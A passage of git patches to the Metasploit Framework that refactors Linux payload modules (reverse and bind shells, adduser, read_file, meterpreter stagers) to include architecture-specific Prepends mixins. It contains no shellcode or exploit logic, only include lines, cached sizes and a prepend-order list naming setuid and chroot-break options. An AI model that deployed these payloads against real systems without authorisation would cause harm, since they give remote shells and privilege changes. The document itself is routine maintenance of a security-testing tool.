b/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb @@ -8,7 +8,7 @@ module MetasploitModule CachedSize = 51 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::X64::Prepends def initialize(info = {}) super(merge_info(info, diff --git a/modules/payloads/singles/linux/x64/shell_find_port.rb b/modules/payloads/singles/linux/x64/shell_find_port.rb index 5e2cab58b8d3..1c10fcd40793 100644 --- a/modules/payloads/singles/linux/x64/shell_find_port.rb +++ b/modules/payloads/singles/linux/x64/shell_find_port.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 98 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::X64::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb b/modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb index 6b67d8b8f628..4ec7fc1faba7 100644 --- a/modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 90 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::X64::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb index a96fd8fceb0b..3e697fe14f13 100644 --- a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 74 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::X64::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/x86/adduser.rb b/modules/payloads/singles/linux/x86/adduser.rb index 0a730f65e584..387791ea89cf 100644 --- a/modules/payloads/singles/linux/x86/adduser.rb +++ b/modules/payloads/singles/linux/x86/adduser.rb @@ -16,7 +16,7 @@ module MetasploitModule CachedSize = 97 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::X86::Prepends def initialize(info = {}) super(merge_info(info, diff --git a/modules/payloads/singles/linux/x86/chmod.rb b/modules/payloads/singles/linux/x86/chmod.rb index d06c51f9a6c6..d301259cd206 100644 --- a/modules/payloads/singles/linux/x86/chmod.rb +++ b/modules/payloads/singles/linux/x86/chmod.rb @@ -13,7 +13,7 @@ module MetasploitModule CachedSize = 36 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::X86::Prepends def initialize(info = {}) super(merge_info(info, diff --git a/modules/payloads/singles/linux/x86/exec.rb b/modules/payloads/singles/linux/x86/exec.rb index bb3b98101506..41146a514d1c 100644 --- a/modules/payloads/singles/linux/x86/exec.rb +++ b/modules/payloads/singles/linux/x86/exec.rb @@ -16,7 +16,7 @@ module MetasploitModule CachedSize = 43 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::X86::Prepends def initialize(info = {}) super(merge_info(info, diff --git a/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb b/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb index 538b2d812aab..cd4a244c231c 100644 --- a/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb +++ b/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb @@ -8,7 +8,7 @@ module MetasploitModule CachedSize = 0 - include Msf::Payload::Linux + include Msf::Payload::Linux::X86::Prepends include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb b/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb index 2883ea6f0b50..0f2bbad4bd0f 100644 --- a/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb @@ -8,7 +8,7 @@ module MetasploitModule CachedSize = 0 - include Msf::Payload::Linux + include Msf::Payload::Linux::X86::Prepends include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/read_file.rb b/modules/payloads/singles/linux/x86/read_file.rb index 2686edce622e..cec49aa4cbd7 100644 --- a/modules/payloads/singles/linux/x86/read_file.rb +++ b/modules/payloads/singles/linux/x86/read_file.rb @@ -8,7 +8,7 @@ module MetasploitModule CachedSize = 63 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::X86::Prepends def initialize(info = {}) super(merge_info(info, diff --git a/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb b/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb index 2f374d73f331..ca7423e91375 100644 --- a/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 90 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::X86::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/x86/shell_bind_tcp.rb b/modules/payloads/singles/linux/x86/shell_bind_tcp.rb index f1e8d10b4b0f..bb2fee56d1e7 100644 --- a/modules/payloads/singles/linux/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_bind_tcp.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 78 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::X86::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb b/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb index c5fa747e8697..ec6ef21d8543 100644 --- a/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb +++ b/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb @@ -8,7 +8,7 @@ module MetasploitModule CachedSize = 57 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::X86::Prepends def initialize(info = {}) super(merge_info(info, diff --git a/modules/payloads/singles/linux/x86/shell_find_port.rb b/modules/payloads/singles/linux/x86/shell_find_port.rb index 9ad0de71274e..9e5b55040866 100644 --- a/modules/payloads/singles/linux/x86/shell_find_port.rb +++ b/modules/payloads/singles/linux/x86/shell_find_port.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 62 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::X86::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/x86/shell_find_tag.rb b/modules/payloads/singles/linux/x86/shell_find_tag.rb index dfa9b6ab5d1a..98afa53bbd65 100644 --- a/modules/payloads/singles/linux/x86/shell_find_tag.rb +++ b/modules/payloads/singles/linux/x86/shell_find_tag.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 69 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::X86::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb index 92a4c2d98e2d..643b4079a9c9 100644 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 68 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::X86::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb index 7ca09731f7c0..a5dd99d5420b 100644 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb +++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb @@ -10,7 +10,7 @@ module MetasploitModule CachedSize = 158 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::X86::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb index 59ec4456055b..d1cdca6aa46e 100644 --- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb @@ -17,6 +17,7 @@ module MetasploitModule CachedSize = 212 + include Msf::Payload::Linux::Aarch64::Prepends include Msf::Payload::Stager def initialize(info = {}) diff --git a/modules/payloads/stagers/linux/armle/bind_tcp.rb b/modules/payloads/stagers/linux/armle/bind_tcp.rb index 22be72c1c8eb..8078e333abb2 100644 --- a/modules/payloads/stagers/linux/armle/bind_tcp.rb +++ b/modules/payloads/stagers/linux/armle/bind_tcp.rb @@ -16,6 +16,7 @@ module MetasploitModule CachedSize = 232 + include Msf::Payload::Linux::Armle::Prepends include Msf::Payload::Stager def initialize(info = {}) diff --git a/modules/payloads/stagers/linux/armle/reverse_tcp.rb b/modules/payloads/stagers/linux/armle/reverse_tcp.rb index af064b8e7eb1..d466845ca769 100644 --- a/modules/payloads/stagers/linux/armle/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/armle/reverse_tcp.rb @@ -16,6 +16,7 @@ module MetasploitModule CachedSize = 260 + include Msf::Payload::Linux::Armle::Prepends include Msf::Payload::Stager def initialize(info = {}) diff --git a/modules/payloads/stagers/linux/x64/bind_tcp.rb b/modules/payloads/stagers/linux/x64/bind_tcp.rb index f66fdad158ff..0a29e655fbcc 100644 --- a/modules/payloads/stagers/linux/x64/bind_tcp.rb +++ b/modules/payloads/stagers/linux/x64/bind_tcp.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 78 include Msf::Payload::Stager - include Msf::Payload::Linux + include Msf::Payload::Linux::X64::Prepends def initialize(info = {}) super(merge_info(info, diff --git a/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb b/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb index 33a9a5d4b9b3..aa331cadd199 100644 --- a/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb @@ -17,7 +17,7 @@ module MetasploitModule CachedSize = 63 include Msf::Payload::Stager - include Msf::Payload::Linux + include Msf::Payload::Linux::X86::Prepends def self.handler_type_alias "bind_nonx_tcp" diff --git a/modules/payloads/stagers/linux/x86/find_tag.rb b/modules/payloads/stagers/linux/x86/find_tag.rb index 84172bc5f372..565a24661fcf 100644 --- a/modules/payloads/stagers/linux/x86/find_tag.rb +++ b/modules/payloads/stagers/linux/x86/find_tag.rb @@ -17,7 +17,7 @@ module MetasploitModule CachedSize = 37 include Msf::Payload::Stager - include Msf::Payload::Linux + include Msf::Payload::Linux::X86::Prepends def initialize(info = {}) super(merge_info(info, diff --git a/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb index 07eb8003b995..c98fe8085204 100644 --- a/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule CachedSize = 77 include Msf::Payload::Stager - include Msf::Payload::Linux + include Msf::Payload::Linux::X86::Prepends def self.handler_type_alias "reverse_ipv6_tcp" diff --git a/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb index ba4c5da8ef71..1d9be6f67610 100644 --- a/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb @@ -17,7 +17,7 @@ module MetasploitModule CachedSize = 50 include Msf::Payload::Stager - include Msf::Payload::Linux + include Msf::Payload::Linux::X86::Prepends def self.handler_type_alias "reverse_nonx_tcp" diff --git a/modules/payloads/stages/linux/x64/shell.rb b/modules/payloads/stages/linux/x64/shell.rb index 3fd72f8df846..773ece7bbf23 100644 --- a/modules/payloads/stages/linux/x64/shell.rb +++ b/modules/payloads/stages/linux/x64/shell.rb @@ -5,7 +5,7 @@ module MetasploitModule - include Msf::Payload::Linux + include Msf::Payload::Linux::X64::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/stages/linux/x86/shell.rb b/modules/payloads/stages/linux/x86/shell.rb index d6bec2b16cea..bc399417bec8 100644 --- a/modules/payloads/stages/linux/x86/shell.rb +++ b/modules/payloads/stages/linux/x86/shell.rb @@ -5,7 +5,7 @@ module MetasploitModule - include Msf::Payload::Linux + include Msf::Payload::Linux::X86::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) From e39af38c73e0728fabdbf38ca49ea35220e6c289 Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Wed, 15 Jan 2025 04:31:53 -0500 Subject: [PATCH 11/12] fix(payloads): updating prepend mixin in payloads --- modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb | 1 - modules/payloads/stagers/linux/mipsle/reverse_tcp.rb | 1 - modules/payloads/stages/linux/mipsbe/shell.rb | 1 - modules/payloads/stages/linux/mipsle/shell.rb | 1 - 4 files changed, 4 deletions(-) diff --git a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb index 4889905b28b5..d17105565e71 100644 --- a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb @@ -9,7 +9,6 @@ module MetasploitModule CachedSize = 272 include Msf::Payload::Stager - include Msf::Payload::Linux def initialize(info = {}) super(merge_info(info, diff --git a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb index eaae2ddad28f..a5062ce6a573 100644 --- a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb @@ -9,7 +9,6 @@ module MetasploitModule CachedSize = 272 include Msf::Payload::Stager - include Msf::Payload::Linux def initialize(info = {}) super(merge_info(info, diff --git a/modules/payloads/stages/linux/mipsbe/shell.rb b/modules/payloads/stages/linux/mipsbe/shell.rb index d8a7695fe137..e8b2e7641c4e 100644 --- a/modules/payloads/stages/linux/mipsbe/shell.rb +++ b/modules/payloads/stages/linux/mipsbe/shell.rb @@ -4,7 +4,6 @@ ## module MetasploitModule - include Msf::Payload::Linux include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/stages/linux/mipsle/shell.rb b/modules/payloads/stages/linux/mipsle/shell.rb index 0d96e44c4da9..bb2b4643fe3e 100644 --- a/modules/payloads/stages/linux/mipsle/shell.rb +++ b/modules/payloads/stages/linux/mipsle/shell.rb @@ -5,7 +5,6 @@ module MetasploitModule - include Msf::Payload::Linux include Msf::Sessions::CommandShellOptions def initialize(info = {}) From 763ff9275eccee6feeebfed70eb5208faf07a523 Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Fri, 17 Jan 2025 02:04:13 -0500 Subject: [PATCH 12/12] fix(payloads): fix x86 prepends --- lib/msf/core/payload/linux/x86/prepends.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/msf/core/payload/linux/x86/prepends.rb b/lib/msf/core/payload/linux/x86/prepends.rb index 2802967d63d5..27462e9626c4 100644 --- a/lib/msf/core/payload/linux/x86/prepends.rb +++ b/lib/msf/core/payload/linux/x86/prepends.rb @@ -2,6 +2,7 @@ # Linux x86 prepends # module Msf::Payload::Linux::X86::Prepends + include Msf::Payload::Linux::Prepends def prepends_order %w[PrependFork PrependSetresuid PrependSetreuid PrependSetuid PrependSetresgid PrependSetregid PrependSetgid PrependChrootBreak] end